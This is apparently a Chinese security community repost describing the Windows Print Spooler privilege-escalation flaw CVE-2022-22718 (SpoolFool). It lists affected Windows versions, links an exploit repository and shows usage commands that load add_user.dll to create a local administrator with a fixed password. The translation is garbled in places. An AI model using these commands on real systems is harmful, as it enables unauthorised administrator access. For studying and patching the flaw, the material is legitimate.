Windows 打印后台处理程序特权提升漏洞CVE-2022-22718

漏洞描述

Microsoft 最初在没有向我提供任何信息或确认的情况下修补了此漏洞,因此,在补丁发布时,我认为该漏洞被标识为 CVE-2022-22718,因为它是该版本中唯一未经任何确认的打印后台处理程序漏洞。我联系了 Microsoft 进行澄清,在补丁发布后的第二天,Institut For Cyber Risk 和我因 CVE-2022–21999 而获得认可。

在这篇博客文章中,我们将介绍我在 2021 年 11 月发现并报告的 Windows 打印后台处理程序本地权限提升漏洞。该漏洞作为微软2022年2月补丁星期二的一部分进行了修补。我们将快速浏览打印后台处理程序的组件和内部工作原理,然后深入研究该漏洞,包括根本原因,代码片段,图像等等。在博客文章的末尾,您还可以找到指向功能漏洞利用的链接。
 


 

影响版本

Windows 10
Windows 11
Windows 8.1
Windows Server
Windows Server 2008
Windows Server 2012
Windows Server 2016
Windows Server 2019
 


 

漏洞复现

https://github.com/LudovicPatho/CVE-2022-22718-SpoolFool
 

用法

PS C:SpoolFool> .SpoolFool.exe
SpoolFool
  By Oliver Lyak (@ly4k_)

Examples:
  C:SpoolFoolSpoolFool.exe -dll add_user.dll
  C:SpoolFoolSpoolFool.exe -dll add_user.dll -printer 'My Printer'
  C:SpoolFoolSpoolFool.exe -dll add_user.dll -dir 'SECRET'
  C:SpoolFoolSpoolFool.exe -dll add_user.dll -printer 'My Printer' -dir 'SECRET'

 
Powershell

PS C:SpoolFool> ipmo .SpoolFool.ps1
PS C:SpoolFool> Invoke-SpoolFool

SpoolFool
  By Oliver Lyak (@ly4k_)

Examples:
   -dll add_user.dll
   -dll add_user.dll -printer 'My Printer'
   -dll add_user.dll -dir 'SECRET'
   -dll add_user.dll -printer 'My Printer' -dir 'SECRET'

  
概念验证
以下 PoC 使用一个新的本地管理员的 DLL。DLL () 和源代码可以在此存储库中找到。admin / Passw0rd!AddUser.dll

图片[1]-Windows 打印后台处理程序特权提升漏洞CVE-2022-22718-孤勇者社区

第二次运行

以下 PoC 演示了所提供漏洞的第二次运行。请注意,这次不会为了加载 DLL 而利用此漏洞。

图片[2]-Windows 打印后台处理程序特权提升漏洞CVE-2022-22718-孤勇者社区
 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞14赞赏 分享
评论 共2条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像的及0
    • 头像谨严0